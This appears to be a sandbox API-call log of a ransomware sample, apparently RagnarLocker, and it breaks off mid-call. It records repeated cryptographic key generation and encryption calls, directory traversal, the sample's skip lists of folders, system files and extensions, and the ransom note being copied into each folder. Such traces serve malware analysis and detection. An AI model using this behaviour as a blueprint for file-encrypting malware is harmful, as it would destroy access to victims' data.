0x3520000 [0174.330] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0174.330] LocalFree (hMem=0x35948f0) returned 0x0 [0174.330] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556660) returned 1 [0174.331] CryptGenRandom (in: hProv=0x3556660, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0174.331] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0174.331] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0174.336] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556bb0) returned 1 [0174.336] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0174.336] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0174.336] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0174.339] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0174.339] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0174.339] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0174.339] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0174.461] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35565d8) returned 1 [0174.462] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0174.462] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.462] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0174.464] CryptEncrypt (in: hKey=0x3547d40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.465] GetLastError () returned 0x80090016 [0174.465] CryptEncrypt (in: hKey=0x3547d40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.465] GetLastError () returned 0x80090016 [0174.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x1048) returned 0x3f0 [0174.466] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556bb0) returned 1 [0174.467] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0174.467] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0174.467] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0174.469] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556bb0) returned 1 [0174.470] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0174.470] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0174.470] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0174.472] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0174.473] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0174.473] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0174.473] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0174.476] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556bb0) returned 1 [0174.476] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0174.476] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0174.476] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0174.479] CryptEncrypt (in: hKey=0x3547d40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.479] GetLastError () returned 0x80090016 [0174.479] CryptEncrypt (in: hKey=0x3547d40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.479] GetLastError () returned 0x80090016 [0174.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x10ac) returned 0x3b4 [0174.480] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0174.697] GetProcessHeap () returned 0x3520000 [0174.698] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586920 | out: hHeap=0x3520000) returned 1 [0174.698] CloseHandle (hObject=0x3f0) returned 1 [0174.698] GetProcessHeap () returned 0x3520000 [0174.698] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0174.699] CloseHandle (hObject=0x3b4) returned 1 [0174.699] GetProcessHeap () returned 0x3520000 [0174.699] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0174.700] FindClose (in: hFindFile=0x3547f80 | out: hFindFile=0x3547f80) returned 1 [0174.701] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0174.701] lstrcmpiW (lpString1="1042", lpString2=".") returned 1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="..") returned 1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Windows") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Windows.old") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Tor browser") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Internet Explorer") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Google") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Opera") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Opera Software") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Mozilla") returned -1 [0174.701] lstrcmpiW (lpString1="1042", lpString2="Mozilla Firefox") returned -1 [0174.702] lstrcmpiW (lpString1="1042", lpString2="$Recycle.Bin") returned 1 [0174.702] lstrcmpiW (lpString1="1042", lpString2="ProgramData") returned -1 [0174.702] lstrcmpiW (lpString1="1042", lpString2="All Users") returned -1 [0174.702] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0174.702] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1042" | out: lpString1="1042") returned="1042" [0174.702] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\" [0174.702] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1042\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\" [0174.702] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\!$R4GN4R_B8CF767A$!.txt" [0174.702] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1042\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0174.708] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*" [0174.708] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.708] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0174.708] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0174.708] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f00 [0174.708] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0174.708] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf57761d6, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.710] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0174.710] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0174.710] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf57761d6, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf57761d6, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0174.710] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0174.710] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0174.710] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0174.710] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0174.710] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0174.710] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0174.710] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0174.710] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0174.710] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0174.710] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0174.710] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0174.711] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0174.711] FindClose (in: hFindFile=0x3547f00 | out: hFindFile=0x3547f00) returned 1 [0174.712] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f00 [0174.712] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf57761d6, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf57761d6, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.713] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf57761d6, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf57761d6, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0174.713] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.713] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0174.713] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0174.713] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0174.713] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0174.713] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.713] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0174.714] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned=".rtf" [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0174.714] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0174.714] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0174.714] GetProcessHeap () returned 0x3520000 [0174.714] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0174.716] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" [0174.716] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0174.716] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.716] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0174.716] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned=".xml" [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0174.716] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0174.716] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0174.717] GetProcessHeap () returned 0x3520000 [0174.717] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0174.718] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0174.718] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0174.718] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1042\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0174.718] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0174.718] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned=".dll" [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0174.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0174.719] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0174.719] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0174.719] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0174.719] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0174.719] FindNextFileW (in: hFindFile=0x3547f00, 